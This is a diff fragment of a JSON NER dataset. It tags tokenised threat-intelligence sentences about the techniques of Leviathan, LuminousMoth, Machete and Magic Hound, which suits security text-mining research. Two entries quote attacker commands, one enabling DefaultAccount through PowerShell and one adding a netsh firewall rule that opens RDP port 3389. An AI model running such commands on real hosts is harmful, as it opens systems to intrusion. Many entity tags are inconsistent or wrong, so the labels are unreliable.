"JavaScript", + "backdoors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "established", + "domains", + "that", + "impersonate", + "legitimate", + "entities", + "to", + "use", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "infected", + "victims", + "using", + "watering", + "holes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "utilized", + "OLE", + "as", + "a", + "method", + "to", + "insert", + "malicious", + "content", + "inside", + "various", + "phishing", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "utilized", + "techniques", + "like", + "reflective", + "DLL", + "loading", + "to", + "write", + "a", + "DLL", + "into", + "memory", + "and", + "load", + "a", + "shell", + "that", + "provides", + "backdoor", + "access", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "compromised", + "email", + "accounts", + "to", + "conduct", + "social", + "engineering", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "created", + "new", + "email", + "accounts", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "obfuscated", + "code", + "using", + "base64", + "and", + "gzip", + "compression." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "an", + "uploader", + "known", + "as", + "LUNCHMONEY", + "that", + "can", + "exfiltrate", + "files", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "exploited", + "multiple", + "Microsoft", + "Office", + "and", + ".NET", + "vulnerabilities", + "for", + "execution,", + "including", + "CVE-2017-0199,", + "CVE-2017-8759,", + "and", + "CVE-2017-11882." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "external", + "remote", + "services", + "such", + "as", + "virtual", + "private", + "networks", + "(VPN)", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "downloaded", + "additional", + "scripts", + "and", + "files", + "from", + "adversary-controlled", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "conducted", + "internal", + "spearphishing", + "within", + "the", + "victim's", + "environment", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "publicly", + "available", + "tools", + "to", + "dump", + "password", + "hashes,", + "including", + "ProcDump", + "and", + "WCE." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "C:\\Windows\\Debug", + "and", + "C:\\Perflogs", + "as", + "staging", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "sent", + "spearphishing", + "attachments", + "attempting", + "to", + "get", + "a", + "user", + "to", + "click." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "sent", + "spearphishing", + "email", + "links", + "attempting", + "to", + "get", + "a", + "user", + "to", + "click." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "multi-hop", + "proxies", + "to", + "disguise", + "the", + "source", + "of", + "their", + "malicious", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "publicly", + "available", + "tools", + "to", + "dump", + "password", + "hashes,", + "including", + "HOMEFRY." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "received", + "C2", + "instructions", + "from", + "user", + "profiles", + "created", + "on", + "legitimate", + "websites", + "such", + "as", + "Github", + "and", + "TechNet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "protocol", + "tunneling", + "to", + "further", + "conceal", + "C2", + "communications", + "and", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "JavaScript", + "to", + "create", + "a", + "shortcut", + "file", + "in", + "the", + "Startup", + "folder", + "that", + "points", + "to", + "its", + "main", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "regsvr32", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "staged", + "data", + "remotely", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "targeted", + "RDP", + "credentials", + "and", + "used", + "it", + "to", + "move", + "through", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "used", + "ssh", + "for", + "internal", + "reconnaissance." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "JavaScript", + "to", + "create", + "a", + "shortcut", + "file", + "in", + "the", + "Startup", + "folder", + "that", + "points", + "to", + "its", + "main", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "compromised", + "social", + "media", + "accounts", + "to", + "conduct", + "social", + "engineering", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "created", + "new", + "social", + "media", + "accounts", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "sent", + "spearphishing", + "emails", + "with", + "malicious", + "attachments,", + "including", + ".rtf,", + ".doc,", + "and", + ".xls", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "sent", + "spearphishing", + "emails", + "with", + "links,", + "often", + "using", + "a", + "fraudulent", + "lookalike", + "domain", + "and", + "stolen", + "branding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "steganography", + "to", + "hide", + "stolen", + "data", + "inside", + "other", + "files", + "stored", + "on", + "Github." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "obtained", + "valid", + "accounts", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "VBScript." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "relies", + "on", + "web", + "shells", + "for", + "an", + "initial", + "foothold", + "as", + "well", + "as", + "persistence", + "into", + "the", + "victim's", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "WMI", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "WMI", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "ARP", + "spoofing", + "to", + "redirect", + "a", + "compromised", + "machine", + "to", + "an", + "actor-controlled", + "website." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "manually", + "archived", + "stolen", + "files", + "from", + "victim", + "machines", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "signed", + "their", + "malware", + "with", + "a", + "valid", + "digital", + "signature." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "legitimate", + "executables", + "such", + "as", + "`winword.exe`", + "and", + "`igfxem.exe`", + "to", + "side-load", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "split", + "archived", + "files", + "into", + "multiple", + "parts", + "to", + "bypass", + "a", + "5MB", + "limit." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "collected", + "files", + "and", + "data", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "a", + "valid", + "digital", + "certificate", + "for", + "some", + "of", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "redirected", + "compromised", + "machines", + "to", + "an", + "actor-controlled", + "webpage", + "through", + "HTML", + "injection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malware", + "that", + "exfiltrates", + "stolen", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "exfiltrated", + "data", + "to", + "Google", + "Drive." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malware", + "that", + "scans", + "for", + "files", + "in", + "the", + "Documents,", + "Desktop,", + "and", + "Download", + "folders", + "and", + "in", + "other", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malware", + "to", + "store", + "malicious", + "binaries", + "in", + "hidden", + "directories", + "on", + "victim's", + "USB", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "downloaded", + "additional", + "malware", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "created", + "a", + "link", + "to", + "a", + "Dropbox", + "file", + "that", + "has", + "been", + "used", + "in", + "their", + "spear-phishing", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "lured", + "victims", + "into", + "clicking", + "malicious", + "Dropbox", + "download", + "links", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "unique", + "malware", + "for", + "information", + "theft", + "and", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "obtained", + "and", + "used", + "malware", + "such", + "as", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "disguised", + "their", + "exfiltration", + "malware", + "as", + "`ZoomVideoApp.exe`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malware", + "that", + "adds", + "Registry", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malicious", + "DLLs", + "that", + "setup", + "persistence", + "in", + "the", + "Registry", + "Key", + "`HKCU\\Software\\Microsoft\\Windows\\Current", + "Version\\Run`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "malicious", + "DLLs", + "to", + "spread", + "malware", + "to", + "connected", + "removable", + "USB", + "drives", + "on", + "infected", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "created", + "scheduled", + "tasks", + "to", + "establish", + "persistence", + "for", + "their", + "tools." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "a", + "malicious", + "Dropbox", + "download", + "link." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "an", + "unnamed", + "post-exploitation", + "tool", + "to", + "steal", + "cookies", + "from", + "the", + "Chrome", + "browser." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "a", + "malicious", + "DLL", + "to", + "collect", + "the", + "username", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "obtained", + "an", + "ARP", + "spoofing", + "tool", + "from", + "GitHub." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "hosted", + "malicious", + "payloads", + "on", + "Dropbox." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LuminousMoth", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "distributed", + "Machete", + "through", + "a", + "fake", + "blog", + "website." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "relied", + "on", + "users", + "opening", + "malicious", + "attachments", + "delivered", + "through", + "spearphishing", + "to", + "execute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "has", + "relied", + "on", + "users", + "opening", + "malicious", + "links", + "delivered", + "through", + "spearphishing", + "to", + "execute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete's", + "Machete", + "MSI", + "installer", + "has", + "masqueraded", + "as", + "a", + "legitimate", + "Adobe", + "Acrobat", + "Reader", + "installer." + ], + "ner_tags": [ + "B-Idus", + "B-Idus", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "msiexec", + "to", + "install", + "the", + "Machete", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "Machete", + "used", + "multiple", + "compiled", + "Python", + "scripts", + "on", + "the", + "victim’s", + "system.", + "Machete's", + "main", + "backdoor", + "Machete", + "is", + "also", + "written", + "in", + "Python." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "created", + "scheduled", + "tasks", + "to", + "maintain", + "Machete's", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "delivered", + "spearphishing", + "emails", + "that", + "contain", + "a", + "zipped", + "file", + "with", + "malicious", + "contents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "sent", + "phishing", + "emails", + "that", + "contain", + "a", + "link", + "to", + "an", + "external", + "server", + "with", + "ZIP", + "and", + "RAR", + "archives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "embedded", + "malicious", + "macros", + "within", + "spearphishing", + "attachments", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "batch", + "files", + "to", + "initiate", + "additional", + "downloads", + "of", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "added", + "a", + "user", + "named", + "DefaultAccount", + "to", + "the", + "Administrators", + "and", + "Remote", + "Desktop", + "Users", + "groups." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-Purp", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "granted", + "compromised", + "email", + "accounts", + "read", + "access", + "to", + "the", + "email", + "boxes", + "of", + "additional", + "targeted", + "accounts.", + "The", + "group", + "then", + "was", + "able", + "to", + "authenticate", + "to", + "the", + "intended", + "victim's", + "OWA", + "(Outlook", + "Web", + "Access)", + "portal", + "and", + "read", + "hundreds", + "of", + "email", + "communications", + "for", + "information", + "on", + "Middle", + "East", + "organizations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "I-Area", + "I-Area", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "used", + "IRC", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "gzip", + "to", + "archive", + "dumped", + "LSASS", + "process", + "memory", + "and", + "RAR", + "to", + "stage", + "and", + "compress", + "local", + "folders." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "can", + "use", + "a", + "SOAP", + "Web", + "service", + "to", + "communicate", + "with", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "removed", + "mailbox", + "export", + "requests", + "from", + "compromised", + "Exchange", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "base64-encoded", + "commands." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "gathered", + "credentials", + "from", + "two", + "victims", + "that", + "they", + "then", + "attempted", + "to", + "validate", + "across", + "75", + "different", + "websites.", + "Magic", + "Hound", + "has", + "also", + "collected", + "credentials", + "from", + "over", + "900", + "Fortinet", + "VPN", + "servers", + "in", + "the", + "US,", + "Europe,", + "and", + "Israel." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "BitLocker", + "and", + "DiskCryptor", + "to", + "encrypt", + "targeted", + "workstations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "a", + "web", + "shell", + "to", + "exfiltrate", + "a", + "ZIP", + "file", + "containing", + "a", + "dump", + "of", + "LSASS", + "memory", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "enabled", + "and", + "used", + "the", + "default", + "system", + "managed", + "account,", + "DefaultAccount,", + "via", + "`\"powershell.exe\"", + "/c", + "net", + "user", + "DefaultAccount", + "/active:yes`", + "to", + "connect", + "to", + "a", + "targeted", + "Exchange", + "server", + "over", + "RDP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "collected", + "location", + "information", + "from", + "visitors", + "to", + "their", + "phishing", + "sites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "executed", + "scripts", + "to", + "disable", + "the", + "event", + "log", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "added", + "the", + "following", + "rule", + "to", + "a", + "victim's", + "Windows", + "firewall", + "to", + "allow", + "RDP", + "traffic", + "-", + "`\"netsh\"", + "advfirewall", + "firewall", + "add", + "rule", + "name=\"Terminal", + "Server\"", + "dir=in", + "action=allow", + "protocol=TCP", + "localport=3389`." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "disabled", + "antivirus", + "services", + "on", + "targeted", + "systems", + "in", + "order", + "to", + "upload", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "domain", + "administrator", + "accounts", + "after", + "dumping", + "LSASS", + "process", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + 